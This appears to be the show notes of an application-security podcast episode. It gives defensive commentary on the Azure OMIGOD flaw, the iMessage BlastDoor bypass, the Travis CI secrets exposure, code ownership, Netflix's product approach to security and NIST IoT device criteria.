OMIGOD, FORCEDENTRY, Code Ownership, Security as a Product, & IoT Device Criteria – ASW #166
This week in the AppSec News, Mike and John talk: RCE in Azure OMI, punching a hole in iMessage BlastDoor, Travis CI exposes sensitive environment variables, keeping code ownership accurate, deploying security as a product, IoT Device Criteria (aka nutrition labels), & more!
InfoSec World 2021 is proud to announce its keynote lineup for this year’s event! Hear from Robert Herjavec plus heads of security at the NFL, TikTok, U.S. Department of Homeland Security, Stanford University, and more… Plus, Security Weekly listeners save 20% on Digital Pass registration! Visit https://securityweekly.com/isw2021 to register now!
In an overabundance of caution, we have decided to flip this year’s SW Unlocked to a virtual format. The safety of our listeners and hosts is our number one priority. We will miss seeing you all in person, but we hope you can still join us at Security Weekly Unlocked Virtual! The event will now take place on Thursday, Dec 16 from 9am-6pm ET. You can still register for free at https://securityweekly.com/unlocked.
Here's a named vulnerability worth of its name. Azure adds an embedded Open Management Infrastructure (OMI) agent to Linux VMs in order to enable them to work with Azure services like Automation, Automatic Update, and Configuration. (There's at least seven Azure services that rely on this. The article provides details.)
This OMI service requires an authorization header. So far so good. What the researchers discovered, and why "OMIGOD" is such a fitting name, is that the service fails open if you omit the header -- more specifically, the request gains root privileges. What's really unfortunate about this, is that OMI is installed by Azure. In the modern "shared responsibility" models of cloud service providers, this is one of the most stark examples of the CSP increasing a customer's attack surface in a way that's likely a big surprise to many customers.
An important part of this story is how information security (and appsec) can have significant consequences for those targeted by authoritarian regimes and governments with poor human rights records. It's a good reminder that not everyone's threat model is the same. A lot of security decisions weigh trade-offs of usability or how well a design addresses certain types of attacks.
Another important part of this story is how design choices can attempt to reduce the impact of exploits. This new vuln in iMessage was still worked against the app's new architecture, BlastDoor, which attempted to create more isolation around notoriously vulnerable areas of code like parsers. After all, parsing images (and other content) represents a major attack surface of messaging apps. While it's disappointing that BlastDoor was still exploited in this manner, that doesn't mean the approach to refactoring iMessage wasn't a smart decision. It means that the appsec work needs to continue.
Check out the Project Zero description of BlastDoor at https://googleprojectzero.blogspot.com/2021/01/a-look-at-imessage-in-ios-14.html
Here's a twitter thread and Google doc with some very in-depth analysis on the Pegasus spyware:
On a similar theme to this week's article about an Azure vuln, here's a case where a CI/CD service provider exposed sensitive environment variables to untrusted builds. In other words, a malicious pull request made to a public repo could gain unauthorized access to secrets in those environment variables. It's a situation particularly challenging for open source projects, since they're intended to foster collaboration on public repos. But it's also a chance to talk about trusted vs. untrusted builds, patterns for managing secrets, and what the attack surface of your CI/CD system looks like. And it's not like CI/CD security in the supply chain hasn't been mentioned once or twice this year...
Here's the security bulletin from Travis CI:
"Who owns this code for this app?" -- that's usually the second question after, "What apps do we have?" And just like saying, "have an app inventory", it's easier said than done. Here's one example of how a company approached the challenge through a standardized expectation and automation to help validate that expectation. It's a good start, but many orgs may see the chicken-and-egg problem of how to identify and populate ownership for orphaned, legacy, or end-of-life services (that never seem to reach an end-of-life and often end up supporting revenue streams -- despite being stale and unowned). Nevertheless, tracking code ownership is something to do early and do often in order to make it a DevOps habit and to be accurate. After all, when that bug bounty report about a critical RCE or gnarly injection comes in, you don't want to have to waste hours or days on figuring out who understands the code well enough to fix it safely and correctly.
Another theme this week seems to be what companies are doing to make fundamental improvements to security. This article from Netflix may be long, but it's worth the read. It reinforces the familiar tone of modern security engineering: build something in collaboration with dev teams. It uses the example of incorporating strong authentication into services and it also calls attention to using a product-based approach rather than a checklist or requirement-based one. This means that not only did the security engineering team focus on a high-risk problem, they communicated the value of their solution to their engineering peers while also taking the time to understand what would make their product successful.
This is the kind of article where we focus less on implementation specifics and more on the principle behind this choice. Don't worry so much about the Android part. Instead, think about the principle of resetting to secure defaults and taking the time to apply that to legacy choices. Put another way, think about the idea of decaying permissions over time to a point where they're fully revoked or close. It's an approach that can put more agency on users to be able to make informed decisions, and it can be a way to reflect permission grants that might be desired at one point in time, but not for all time. We've seen similar changes in the way iPhone has managed more granular or time-based permissions within its apps, such as accessing a single photo rather than everything in the Photos app, or allowing location access for a short period of time.
There's not much new in this article yet, but it is a good reminder of the aggressive timeline that NIST has set for IoT Device Criteria. NIST just recently hosted a workshop, which they'll be posting the videos for soon (we'll keep an eye out).
You can find a link to the draft IoT Device Criteria at https://www.nist.gov/itl/executive-order-improving-nations-cybersecurity/iot-device-criteria. Comments are due October 17, 2021. So for those of you with strong feelings on software updates, authentication, encrypted connections, and other product security issues that may appear in these criteria, you'll want to check it out.
Some additional info from NIST is at:
We're venturing on the edge of think piece territory again with this article. Even so, the very first pitfall should be something that appsec teams be wary of when they're talking to their org's leadership just as much as when they're talking to devs: Talking about security risk, rather than business risk.
Just as we continuously talk about the importance of the dev experience in modern appsec tools and processes, the way appsec teams talk about and prioritize vulns is just as important. It's another reason why the OWASP Top 10 remains a good reference to raise awareness about common security flaws -- and why it needs more context about your org's apps, their frameworks, their data, their workflows, and their business impact in order to be a rich conversation about why security is important. That's the difference between mistreating the Top 10 as a standard and using it as a departure point for a robust secure SDLC.
Breach disclosures from T-Mobile and PayPal, SSRF in Azure services, Google Threat Horizons report, integer overflows and more, Rust in Chromium, ML for web scanning, Top 10 web hacking techniques of 2022
Exposed secrets from CircleCI, web hackers target the auto industry, $100K bounty for making Google smart speakers listen, inspiration from Office Space, AWS making better defaults for S3, resources for learning Rust